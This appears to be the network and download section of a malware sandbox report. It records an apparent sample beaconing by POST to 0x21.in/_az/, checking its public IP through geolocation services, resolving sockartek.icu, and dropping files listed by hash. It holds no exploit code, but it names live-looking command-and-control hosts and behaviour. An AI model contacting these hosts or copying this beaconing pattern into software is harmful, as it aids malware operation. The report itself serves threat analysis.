Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228145|1741228110|17|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 97
ResponseHTTP/1.1 200 OK
Date: Thu, 06 Mar 2025 02:29:06 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=eb93f7a51db95eed89133dbe09bccd01|212.102.63.147|1741228146|1741228146|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Requestsockartek.icuIN AResponse
-
152 B 3
-
44.221.84.105:8000http://0x21.in:8000/_az/httpd1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe480 B 870 B 5 5
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
469 B 590 B 5 5
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
1.7kB 52 B 12 1
HTTP Request
GET http://ip-api.com/json/ -
428 B 604 B 6 4
HTTP Request
GET http://freegeoip.net/xml/HTTP Response
200 -
424 B 1.1kB 6 4
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
1.3kB 52 B 10 1
HTTP Request
GET http://ip-api.com/json/ -
474 B 644 B 7 5
HTTP Request
GET http://freegeoip.net/xml/HTTP Response
200 -
152 B 3
-
424 B 1.1kB 6 4
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
152 B 3
-
152 B 3
-
591 B 791 B 5 5
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
469 B 590 B 5 5
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
152 B 3
-
104 B 2
-
152 B 3
-
152 B 3
-
52 B 1
-
152 B 3
-
52 B 1
-
52 B 1
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
59 B 91 B 1 1
DNS Request
freegeoip.net
DNS Response
3.33.130.19015.197.148.33
-
59 B 107 B 1 1
DNS Request
api.ipify.org
DNS Response
104.26.12.205104.26.13.205172.67.74.152
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
-
59 B 124 B 1 1
DNS Request
sockartek.icu
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
208B
MD57e3cfd68e73df269a38f23b3cb71fd6c
SHA12ae2b4a669e96c5042ce8b0ef4547968650ffeee
SHA25633ff14010fd28d876f19142c08d0b389812bb3387366fe5db5696afcb20890d8
SHA512e3d51e66d6fd5d64114b83ea78873880860275ba0fb15efca15d0abb8c53bdd09f71febae3a801b3d9b2788a16769fc07dce33481caae0af45180f8929b86dbe
-
Filesize
213B
MD59b8dc42f62fa34a9e12500c9dc7ed921
SHA19cadf33a3dc02d4f11e5d7742337d5f9d26fd4b9
SHA256fc27dbb9b662c69b120cdd0747ed8fe39fceb1d28b7e92dd27f3354663a9186a
SHA5129ba2bba9f64a4571b5796ee5271462e082b331e51c860890b929a6ea10cab73e2003c87fd1b0c71fa8595bfe45c6e38010739d1fa6c7118b3c4627b0e132e355
-
Filesize
2.0MB
MD5671ca71c4f30eadb0e504e017979478a
SHA11ce79f9e434739f8605f58b6c2559f3c2f973586
SHA256797eb576c2e91590e0363d6a203c6d949711cba98ff7cd4878a6c101d209b401
SHA512826aac05471f9cf6fa35ffba7a3fcafe33c682a548c7c47d2df87ebf746b397f16f8dc85f5433a0bd40a9397d7b13307db0b7a88809581cb403146f9fc28a12a
-
Filesize
405KB
MD5b8ba87ee4c3fc085a2fed0d839aadce1
SHA1b3a2e3256406330e8b1779199bb2b9865122d766
SHA2564e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
SHA5127a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
-
Filesize
349KB
MD5b4a202e03d4135484d0e730173abcc72
SHA101b30014545ea526c15a60931d676f9392ea0c70
SHA2567050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
SHA512632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb